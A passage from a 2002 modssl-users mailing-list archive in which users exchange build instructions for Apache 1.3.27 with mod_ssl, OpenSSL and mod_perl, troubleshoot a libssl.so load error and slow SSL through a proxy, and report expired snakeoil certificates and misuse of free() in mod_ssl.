Subject: RE: Apache_1.3.27 and ssl
Date: Wed, 23 Oct 2002 09:49:07 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C27AA3.56BF22E0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kong, Yi - HPL" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C27AA3.56BF22E0
Content-Type: text/plain;
	charset="iso-8859-1"

Any suggestion on upgrade? We can run the same procedure or need to remove
the old one first?
 
Thanks
 
Yi

-----Original Message-----
From: tgarner@gwii.com [mailto:tgarner@gwii.com]
Sent: Tuesday, October 22, 2002 4:40 PM
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.27 and ssl



Here's what we did: 

#################################################################### 
# notes to install and configure apache with modules, mod_perl, so 
#################################################################### 

    #   extract the packages 
    
    $ gzip -d -c openssl-0.9.6a.tar.gz | tar xvf - 
!!! 
    ########################## 
    INSTALL openssl first !!! 
    ########################## 
!!! 

    $ gzip -d -c apache_1.3.x.tar.gz | tar xvf - 
    $ gzip -d -c mod_ssl-2.8.x-1.3.x.tar.gz | tar xvf - 
    $ gzip -d -c mod_perl-1.xx.tar.gz | tar xvf - 

    ######################################################## 
    #   apply mod_ssl to Apache source tree 

      cd mod_ssl* 
      ./configure --with-apache=../apache_1.3.27 
    ######################################################## 
    #   apply mod_perl to Apache source tree 
    #   and build/install the Perl-side of mod_perl 
    
    cd mod_perl-1.27 
    perl Makefile.PL EVERYTHING=1 APACHE_SRC=../apache_1.3.27/src
USE_APACI=1 PREP_HTTPD=1 DO_HTTPD=1 
    make 
    make install 
    cd ../ 
    ######################################################## 

    #   build/install Apache with mod_ssl and mod_perl 

    cd apache_1.3.27 
    SSL_BASE=../openssl-0.9.6a ./configure --prefix=/usr/local/apache
--enable-module=ssl --activate-module=src/modules/perl/libperl.a
--enable-module=perl --enable-module=so 
    make 
    make certificate 
    make install 
    cd ../ 
    ######################################################## 


Troy Garner
Information Technology Manager
Gulf Winds International, Inc.
713.747.4909 x5753
www.gwii.com




	leanne lai  
Sent by: owner-modssl-users@modssl.org 


10/22/2002 04:26 PM 
Please respond to modssl-users 


        
        To:        modssl-users@modssl.org 
        cc:         
        Subject:        Apache_1.3.27 and ssl



Dear All,

I don't know whether this is the right place for asking this question 
but I am desperate :(

I am trying to compile apache_1.3.27 and mod_ssl-2.8.11-1.3.27, 
however, apachec_1.3.27 does not seem to have "enable_module=ssl" 
option anymore in its congfigure script!!!

Help!

Thanks,
Leanne

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org







------_=_NextPart_001_01C27AA3.56BF22E0
Content-Type: text/html;
	charset="iso-8859-1"









Any 
suggestion on upgrade? We can run the same procedure or need to remove the old 
one first?


 


Thanks


 


Yi



  
-----Original Message-----
From: tgarner@gwii.com 
  [mailto:tgarner@gwii.com]
Sent: Tuesday, October 22, 2002 4:40 
  PM
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.27 
  and ssl


Here's what we 
  did: 

#################################################################### 
  
# notes to install and configure apache 
  with modules, mod_perl, so 
#################################################################### 
  

    #   extract the 
  packages 
    
  
    $ gzip -d -c 
  openssl-0.9.6a.tar.gz | tar xvf - 
!!! 
    
  ########################## 
  
    INSTALL openssl first !!! 
    ########################## 
!!! 

    $ gzip -d -c apache_1.3.x.tar.gz | tar xvf - 
  
    $ gzip -d -c 
  mod_ssl-2.8.x-1.3.x.tar.gz | tar xvf - 
    $ gzip -d -c mod_perl-1.xx.tar.gz | tar xvf - 
  

    
  ######################################################## 
    #   apply mod_ssl to Apache 
  source tree 

    
    cd mod_ssl* 
    
    ./configure --with-apache=../apache_1.3.27 
    
  ######################################################## 
    #   apply mod_perl to Apache 
  source tree 
    #   
  and build/install the Perl-side of mod_perl 
    
    cd mod_perl-1.27 
    perl Makefile.PL EVERYTHING=1 
  APACHE_SRC=../apache_1.3.27/src USE_APACI=1 PREP_HTTPD=1 DO_HTTPD=1 
  
    make 
    make install 
    cd ../ 
    
  ######################################################## 

    #   build/install Apache with 
  mod_ssl and mod_perl 

  
    cd apache_1.3.27 
  
    SSL_BASE=../openssl-0.9.6a ./configure --prefix=/usr/local/apache 
  --enable-module=ssl --activate-module=src/modules/perl/libperl.a 
  --enable-module=perl --enable-module=so 
    make 
  
    make certificate 
  
    make install 
    
  cd ../ 
    
  ######################################################## 


Troy Garner
Information Technology 
  Manager
Gulf Winds International, Inc.
713.747.4909 
  x5753
www.gwii.com




  

    
    

      
      leanne lai 
        <leanne@nacse.org> 
Sent by: owner-modssl-users@modssl.org 
        
10/22/2002 04:26 PM 
Please respond to modssl-users 

      		        
        To:     
           modssl-users@modssl.org 
        cc:       
          
      
          Subject:        Apache_1.3.27 and 
    ssl



Dear All,

I don't know whether this is the right place for 
  asking this question 
but I am desperate :(

I am trying to compile 
  apache_1.3.27 and mod_ssl-2.8.11-1.3.27, 
however, apachec_1.3.27 does not 
  seem to have "enable_module=ssl" 
option anymore in its congfigure 
  script!!!

Help!

Thanks,
Leanne

______________________________________________________________________
Apache 
  Interface to OpenSSL (mod_ssl)             
        www.modssl.org
User Support Mailing List     
                  
   modssl-users@modssl.org
Automated List Manager       
                      
   majordomo@modssl.org






------_=_NextPart_001_01C27AA3.56BF22E0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 23 16:54:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA20657; Wed, 23 Oct 2002 16:53:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from nixpbe.pdb.sbs.de id QAA20609; Wed, 23 Oct 2002 16:52:04 +0200 (MET DST)
Received: from trulli.pdb.fsc.net ([172.25.96.20])
	by nixpbe.pdb.sbs.de (8.11.6/8.11.2) with ESMTP id g9NEq2h27984;
	Wed, 23 Oct 2002 16:52:02 +0200
Received: from deejai2.mch.fsc.net (deejai2.mch.fsc.net [172.25.124.236])
	by trulli.pdb.fsc.net (8.11.6/8.11.6) with ESMTP id g9NEq1i27435;
	Wed, 23 Oct 2002 16:52:01 +0200
Received: (from root@localhost)
	by deejai2.mch.fsc.net (8.12.6/8.12.6) id g9NEq1gR058957;
	Wed, 23 Oct 2002 16:52:01 +0200 (CEST)
	(envelope-from martin@deejai2.mch.fsc.net)
Received: from deejai2.mch.fsc.net (localhost [127.0.0.1])
	by deejai2.mch.fsc.net (8.12.6/8.12.6) with ESMTP id g9NEpsRd058949;
	Wed, 23 Oct 2002 16:51:54 +0200 (CEST)
	(envelope-from martin@deejai2.mch.fsc.net)
Received: (from martin@localhost)
	by deejai2.mch.fsc.net (8.12.6/8.12.6/Submit) id g9NEprPR058948;
	Wed, 23 Oct 2002 16:51:53 +0200 (CEST)
Date: Wed, 23 Oct 2002 16:51:53 +0200
From: Martin Kraemer 
To: modssl-users@modssl.org, rse@engelschall.org, rse@apache.org
Subject: Re: [ANNOUNCE] mod_ssl 2.8.12
Message-ID: <20021023165153.D38585@deejai2.mch.fsc.net>
References: <20021023091519.GA22374@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: <20021023091519.GA22374@engelschall.com>; from rse@engelschall.com on Wed, Oct 23, 2002 at 11:15:19AM +0200
X-Operating-System: FreeBSD 4.7-STABLE FreeBSD 4.7-STABLE
X-Organization: Fujitsu Siemens Computers (Muenchen, Germany)
X-Disclaimer: THE COMMENTS CONTAINED IN THIS MESSAGE REFLECT THE VIEWS OF THE  WRITER AND ARE NOT NECESSARILY THE VIEWS OF FUJITSU-SIEMENS COMPUTERS
X-No-Junk-Mail: I do not want to get *any* junk mail.
X-Virus-Scanned: by AMaViS perl-11
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Martin Kraemer 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, Oct 23, 2002 at 11:15:19AM +0200, Ralf S. Engelschall wrote:
> Because of a found Cross-Side-Scripting (XSS) bug in mod_ssl, the fixed
> maintainance version mod_ssl 2.8.12 is available for use with Apache
> 1.3.27.

Thanks!

...but the snakeoil certificates are still expired:

% openssl x509 -noout -text < mod_ssl-2.8.12-1.3.27/pkg.sslcfg/snakeoil-ca-rsa.crt
...
        Validity
            Not Before: Oct 21 18:21:46 1999 GMT
            Not After : Oct 20 18:21:46 2001 GMT

% openssl x509 -noout -text < mod_ssl-2.8.12-1.3.27/pkg.sslcfg/snakeoil-rsa.crt
...
        Validity
            Not Before: Oct 21 18:21:51 1999 GMT
            Not After : Oct 20 18:21:51 2001 GMT

    Martin
-- 
         |     Fujitsu Siemens
Fon: +49-89-636-46021, FAX: +49-89-636-47655 | 81730  Munich,  Germany
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 23 16:56:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA20774; Wed, 23 Oct 2002 16:55:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id QAA20758; Wed, 23 Oct 2002 16:55:03 +0200 (MET DST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0a.swx.com (8.12.6/8.12.6) with ESMTP id g9NEt2cF028250
	for ; Wed, 23 Oct 2002 16:55:02 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.6/8.12.6) with ESMTP id g9NEt2eQ008488
	for ; Wed, 23 Oct 2002 16:55:02 +0200 (MEST)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: SSL - MS Proxy 2.0 - MSIE6
Date: Wed, 23 Oct 2002 16:55:01 +0200
Message-ID: <484A6CA492BE654395D208B1D8D5393972F6B7@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: SSL - MS Proxy 2.0 - MSIE6
Importance: normal
Thread-Index: AcJ6oJzp27WrwGihTfeyEnnVG3p0+wAAsbwg
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I rather meant what processor speed and memory, etc. SSL encryption and
decryption is fairly intense mathematically... Especially, your machines
should have enough RAM that they never need to swap.

Also, are any important files (certs etc.) on network drives which might
introduce a network latency. 

-----Original Message-----
From: erwin.vogeleer@deltalloydLife.be
[mailto:erwin.vogeleer@deltalloydLife.be]
Sent: Mittwoch, 23. Oktober 2002 16:26
To: modssl-users@modssl.org
Subject: RE: SSL - MS Proxy 2.0 - MSIE6



The server is running NT4 and the clients XP and win2000.





 
"Boyle Owen"

m>                        cc:
Sent by:                  Subject:  RE: SSL - MS Proxy 2.0 - MSIE6
owner-modssl-users
@modssl.org
23/10/2002 16:19
Please respond to
modssl-users
What spec do you have on the server and client?

-----Original Message-----
From: erwin.vogeleer@deltalloydLife.be
[mailto:erwin.vogeleer@deltalloydLife.be]
Sent: Mittwoch, 23. Oktober 2002 16:09
To: modssl-users@modssl.org
Subject: SSL - MS Proxy 2.0 - MSIE6


Dear all,



I'm using:
Apache 1.3.26
mod_ssl: 2.8.10
openSSL: 0.9.6g

At the client site I use MSIE6 and I have a MS proxy 2.0.

When I enable SSL the connections/communication is very slooooow. If I
disable it, the site works perfect.

Does anybody have an idea?


thx
Erwin


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org





______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 23 17:11:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA22104; Wed, 23 Oct 2002 17:10:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from GULFWINDSINTL.COM id RAA21997; Wed, 23 Oct 2002 17:10:03 +0200 (MET DST)
From: tgarner@gwii.com
To: modssl-users@modssl.org
Subject: RE: Apache_1.3.27 and ssl
Message-ID: 
Date: Wed, 23 Oct 2002 10:10:05 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="=_alternative 00534FAC86256C5B_="
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: tgarner@gwii.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multipart message in MIME format.
--=_alternative 00534FAC86256C5B_=
Content-Type: text/plain; charset="us-ascii"

We upgraded; we did not remove any prior versions.

Troy Garner
Information Technology Manager
Gulf Winds International, Inc.
713.747.4909 x5753
www.gwii.com





"Kong, Yi - HPL" 
Sent by: owner-modssl-users@modssl.org
10/23/2002 09:49 AM
Please respond to modssl-users

 
        To:     "'modssl-users@modssl.org'" 
        cc: 
        Subject:        RE: Apache_1.3.27 and ssl

Any suggestion on upgrade? We can run the same procedure or need to remove 
the old one first?
 
Thanks
 
Yi
-----Original Message-----
From: tgarner@gwii.com [mailto:tgarner@gwii.com]
Sent: Tuesday, October 22, 2002 4:40 PM
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.27 and ssl


Here's what we did: 

#################################################################### 
# notes to install and configure apache with modules, mod_perl, so 
#################################################################### 

    #   extract the packages 
 
    $ gzip -d -c openssl-0.9.6a.tar.gz | tar xvf - 
!!! 
    ########################## 
    INSTALL openssl first !!! 
    ########################## 
!!! 

    $ gzip -d -c apache_1.3.x.tar.gz | tar xvf - 
    $ gzip -d -c mod_ssl-2.8.x-1.3.x.tar.gz | tar xvf - 
    $ gzip -d -c mod_perl-1.xx.tar.gz | tar xvf - 

    ######################################################## 
    #   apply mod_ssl to Apache source tree 

      cd mod_ssl* 
      ./configure --with-apache=../apache_1.3.27 
    ######################################################## 
    #   apply mod_perl to Apache source tree 
    #   and build/install the Perl-side of mod_perl 
 
    cd mod_perl-1.27 
    perl Makefile.PL EVERYTHING=1 APACHE_SRC=../apache_1.3.27/src 
USE_APACI=1 PREP_HTTPD=1 DO_HTTPD=1 
    make 
    make install 
    cd ../ 
    ######################################################## 

    #   build/install Apache with mod_ssl and mod_perl 

    cd apache_1.3.27 
    SSL_BASE=../openssl-0.9.6a ./configure --prefix=/usr/local/apache 
--enable-module=ssl --activate-module=src/modules/perl/libperl.a 
--enable-module=perl --enable-module=so 
    make 
    make certificate 
    make install 
    cd ../ 
    ######################################################## 


Troy Garner
Information Technology Manager
Gulf Winds International, Inc.
713.747.4909 x5753
www.gwii.com




leanne lai  
Sent by: owner-modssl-users@modssl.org 
10/22/2002 04:26 PM 
Please respond to modssl-users 
        
        To:        modssl-users@modssl.org 
        cc:         
        Subject:        Apache_1.3.27 and ssl



Dear All,

I don't know whether this is the right place for asking this question 
but I am desperate :(

I am trying to compile apache_1.3.27 and mod_ssl-2.8.11-1.3.27, 
however, apachec_1.3.27 does not seem to have "enable_module=ssl" 
option anymore in its congfigure script!!!

Help!

Thanks,
Leanne

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org






--=_alternative 00534FAC86256C5B_=
Content-Type: text/html; charset="us-ascii"





We upgraded; we did not remove any prior versions.



Troy Garner

Information Technology Manager

Gulf Winds International, Inc.

713.747.4909 x5753

www.gwii.com













"Kong, Yi - HPL" <Yi.Kong@cityofhouston.net>

Sent by: owner-modssl-users@modssl.org

10/23/2002 09:49 AM

Please respond to modssl-users



        

        To:        "'modssl-users@modssl.org'" <modssl-users@modssl.org>

        cc:        

        Subject:        RE: Apache_1.3.27 and ssl




Any suggestion on upgrade? We can run the same procedure or need to remove the old one first?

 

Thanks

 

Yi

-----Original Message-----

From: tgarner@gwii.com [mailto:tgarner@gwii.com]

Sent: Tuesday, October 22, 2002 4:40 PM

To: modssl-users@modssl.org

Subject: Re: Apache_1.3.27 and ssl





Here's what we did: 



#################################################################### 

# notes to install and configure apache with modules, mod_perl, so 

#################################################################### 



    #   extract the packages 

    

    $ gzip -d -c openssl-0.9.6a.tar.gz | tar xvf - 

!!! 

    ########################## 

    INSTALL openssl first !!! 

    ########################## 

!!! 



    $ gzip -d -c apache_1.3.x.tar.gz | tar xvf - 

    $ gzip -d -c mod_ssl-2.8.x-1.3.x.tar.gz | tar xvf - 

    $ gzip -d -c mod_perl-1.xx.tar.gz | tar xvf - 



    ######################################################## 

    #   apply mod_ssl to Apache source tree 



      cd mod_ssl* 

      ./configure --with-apache=../apache_1.3.27 

    ######################################################## 

    #   apply mod_perl to Apache source tree 

    #   and build/install the Perl-side of mod_perl 

    

    cd mod_perl-1.27 

    perl Makefile.PL EVERYTHING=1 APACHE_SRC=../apache_1.3.27/src USE_APACI=1 PREP_HTTPD=1 DO_HTTPD=1 

    make 

    make install 

    cd ../ 

    ######################################################## 



    #   build/install Apache with mod_ssl and mod_perl 



    cd apache_1.3.27 

    SSL_BASE=../openssl-0.9.6a ./configure --prefix=/usr/local/apache --enable-module=ssl --activate-module=src/modules/perl/libperl.a --enable-module=perl --enable-module=so 

    make 

    make certificate 

    make install 

    cd ../ 

    ######################################################## 





Troy Garner

Information Technology Manager

Gulf Winds International, Inc.

713.747.4909 x5753

www.gwii.com











leanne lai <leanne@nacse.org> 

Sent by: owner-modssl-users@modssl.org 

10/22/2002 04:26 PM 

Please respond to modssl-users 

        

        To:        modssl-users@modssl.org 

        cc:         

        Subject:        Apache_1.3.27 and ssl








Dear All,



I don't know whether this is the right place for asking this question 

but I am desperate :(



I am trying to compile apache_1.3.27 and mod_ssl-2.8.11-1.3.27, 

however, apachec_1.3.27 does not seem to have "enable_module=ssl" 

option anymore in its congfigure script!!!



Help!



Thanks,

Leanne



______________________________________________________________________

Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org

User Support Mailing List                      modssl-users@modssl.org

Automated List Manager                            majordomo@modssl.org












--=_alternative 00534FAC86256C5B_=--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 23 23:05:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA01278; Wed, 23 Oct 2002 23:04:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fsjrez04.irr.rl.af.mil id XAA01268; Wed, 23 Oct 2002 23:03:38 +0200 (MET DST)
Received: by FSJREZ04.irr.rl.af.mil with Internet Mail Service (5.5.2653.19)
	id ; Wed, 23 Oct 2002 21:03:21 -0000
Message-ID: 
From: Zandi Patrick S TSgt AFRL/IFOSS 
To: "'modssl-users@modssl.org'" 
Subject: ld.so.1: /apache/bin/httpd: fatal: libssl.so.0.9.6: open failed
Date: Wed, 23 Oct 2002 21:03:21 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C27AD7.9E3A1E5D"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Zandi Patrick S TSgt AFRL/IFOSS 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C27AD7.9E3A1E5D
Content-Type: text/plain

hello folks,   --- Got trouble.. here is the details  .. anyone see
anything..
 
./apachectl startssl
Syntax error on line 238 of /apache/conf/httpd.conf:
Cannot load /apache/libexec/libssl.so into server: ld.so.1:
/apache/bin/httpd: fatal: libssl.so.0.9.6: open failed: No such file or
directory
./apachectl startssl: httpd could not be started
 
Compile in modssl folder was:
    ./configure \
"--with-apache=../apache_1.3.27" \
"--with-ssl=/usr/local/ssl" \
"$@"

Compile in apache folder was:
 ./configure \
"--with-layout=Apache" \
"--verbose" \
"--prefix=/apache" \
"--server-uid=ars" \
"--server-gid=dba" \
"--with-perl=/usr/local/perl" \
"--enable-module=most" \
"--enable-shared=max" \
"--enable-rule=SHARED_CORE" \
"--enable-module=so" \
"--enable-module=cgi" \
"--enable-module=ssl" \
"--disable-rule=SSL_COMPAT" \
"--enable-rule=SSL_SDBM" \
"$@"
 
---httpd.conf  States from line 230 - 245 or so..
 
 234  LoadModule usertrack_module   libexec/mod_usertrack.so
   235  LoadModule unique_id_module   libexec/mod_unique_id.so
   236  LoadModule setenvif_module    libexec/mod_setenvif.so
   237  
   238  LoadModule ssl_module         libexec/libssl.so
   239  
   240

-- LS of   ../libexec    is
-rw-r--r--   1 root     other       8373 Oct 23 16:25 httpd.exp
-rwxr-xr-x   1 root     other      22108 Oct 23 16:25 libhttpd.ep
-rwxr-xr-x   2 root     other     669008 Oct 23 16:25 libhttpd.so
-rwxr-xr-x   2 root     other     669008 Oct 23 16:25 libhttpd.so.1
-rwxr-xr-x   1 root     other     137680 Oct 23 16:25 libproxy.so
-rwxr-xr-x   1 root     other     276708 Oct 23 16:25 libssl.so
-rwxr-xr-x   1 root     other       9272 Oct 23 16:25 mod_access.so

 





------_=_NextPart_001_01C27AD7.9E3A1E5D
Content-Type: text/html




Message




hello 
folks,   --- Got trouble.. here is the details  .. anyone see 
anything..


 


./apachectl startssl
Syntax error on line 238 of 
/apache/conf/httpd.conf:
Cannot load /apache/libexec/libssl.so into server: 
ld.so.1: /apache/bin/httpd: fatal: libssl.so.0.9.6: open failed: No such file or 
directory
./apachectl startssl: httpd could not be started


 


Compile 
in modssl folder was:


    ./configure 
\
"--with-apache=../apache_1.3.27" \
"--with-ssl=/usr/local/ssl" 
\
"$@"


Compile 
in apache folder was:


 ./configure \
"--with-layout=Apache" 
\
"--verbose" \
"--prefix=/apache" \
"--server-uid=ars" 
\
"--server-gid=dba" \
"--with-perl=/usr/local/perl" 
\
"--enable-module=most" \
"--enable-shared=max" 
\
"--enable-rule=SHARED_CORE" \
"--enable-module=so" 
\
"--enable-module=cgi" \
"--enable-module=ssl" 
\
"--disable-rule=SSL_COMPAT" \
"--enable-rule=SSL_SDBM" 
\
"$@"


 


---httpd.conf  States from line 230 - 245 or 
so..


 


 234  LoadModule 
usertrack_module   libexec/mod_usertrack.so
   235  
LoadModule unique_id_module   libexec/mod_unique_id.so
   
236  LoadModule setenvif_module    
libexec/mod_setenvif.so
   237  <IfDefine 
SSL>
   238  LoadModule 
ssl_module         
libexec/libssl.so
   239  </IfDefine>
   
240


-- LS of   ../libexec    
is


-rw-r--r--   1 root     
other       8373 Oct 23 16:25 
httpd.exp
-rwxr-xr-x   1 root     
other      22108 Oct 23 16:25 
libhttpd.ep
-rwxr-xr-x   2 root     
other     669008 Oct 23 16:25 
libhttpd.so
-rwxr-xr-x   2 root     
other     669008 Oct 23 16:25 
libhttpd.so.1
-rwxr-xr-x   1 root     
other     137680 Oct 23 16:25 
libproxy.so
-rwxr-xr-x   1 root     
other     276708 Oct 23 16:25 
libssl.so
-rwxr-xr-x   1 root     
other       9272 Oct 23 16:25 
mod_access.so


 






  


------_=_NextPart_001_01C27AD7.9E3A1E5D--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 23 23:52:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA02513; Wed, 23 Oct 2002 23:51:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fermat.math.technion.ac.il id XAA02496; Wed, 23 Oct 2002 23:50:36 +0200 (MET DST)
Received: from fermat.math.technion.ac.il (localhost [127.0.0.1])
	by fermat.math.technion.ac.il (8.12.1/8.12.1) with ESMTP id g9NLoZiX015116;
	Wed, 23 Oct 2002 23:50:35 +0200 (IST)
Received: (from nyh@localhost)
	by fermat.math.technion.ac.il (8.12.1/8.12.1/Submit) id g9NLoYH2015115;
	Wed, 23 Oct 2002 23:50:34 +0200 (IST)
Date: Wed, 23 Oct 2002 23:50:34 +0200
From: "Nadav Har'El" 
To: modssl-users@modssl.org
Subject: Trivial bug: inappropriate use of free()
Message-ID: <20021023215034.GA14998@fermat.math.technion.ac.il>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4i
Hebrew-Date: 18 Heshvan 5763
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nadav Har'El" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

Mod_ssl uses free() inappropriately in several places, to free memory which
has been previously allocated inside OpenSSL. Such memory should be freed
with OPENSSL_free(), not with free().

There is usually no difference, but when allocation debugging is turned on
in OpenSSL, or another allocator is used for some reason (OpenSSL has an
option to do that), using free() can cause problems ranging from harder
debugging to actually causing bugs.

Note that most wrong free() calls (labeled free(cp*) below) are done for
debugging printouts. But these are nevertheless potentially-serious
oversights because that code *always* gets executed (a waste of its own,
but that's another issue), not only when debugging (TRACE) logging is enabled.

Wrong uses of free: (in mod_ssl-2.8.11-1.3.27)

ssl_engine_ext.c: 	4 calls to free(cp*) after X509_NAME_oneline().
ssl_engine_kernel.c:	7 calls to free(cp*) after X509_NAME_oneline().
ssl_engine_vars.c:	2 calls to free(cp*) after X509_NAME_oneline().
ssl_util_ssl.c:		1 calls to free() after BN_bn2dec()

I suggest that all these places should call OPENSSL_free() instead of free.

Thanks,
	Nadav.

-- 
Nadav Har'El                        |  Wednesday, Oct 23 2002, 18 Heshvan 5763
nyh@math.technion.ac.il             |-----------------------------------------
Phone: +972-53-245868, ICQ 13349191 |A smart man always covers his ass. A wise
http://nadav.harel.org.il           |man just keeps his pants on.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 24 09:44:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA17469; Thu, 24 Oct 2002 09:43:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id JAA17459; Thu, 24 Oct 2002 09:42:30 +0200 (MET DST)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id g9O7gOHc020510
	for ; Thu, 24 Oct 2002 09:42:24 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id g9O7gNqL012633
	for ; Thu, 24 Oct 2002 09:42:24 +0200 (MEST)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: ld.so.1: /apache/bin/httpd: fatal: libssl.so.0.9.6: open failed
Date: Thu, 24 Oct 2002 09:42:23 +0200
Message-ID: <484A6CA492BE654395D208B1D8D5393973A457@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: ld.so.1: /apache/bin/httpd: fatal: libssl.so.0.9.6: open failed
Importance: normal
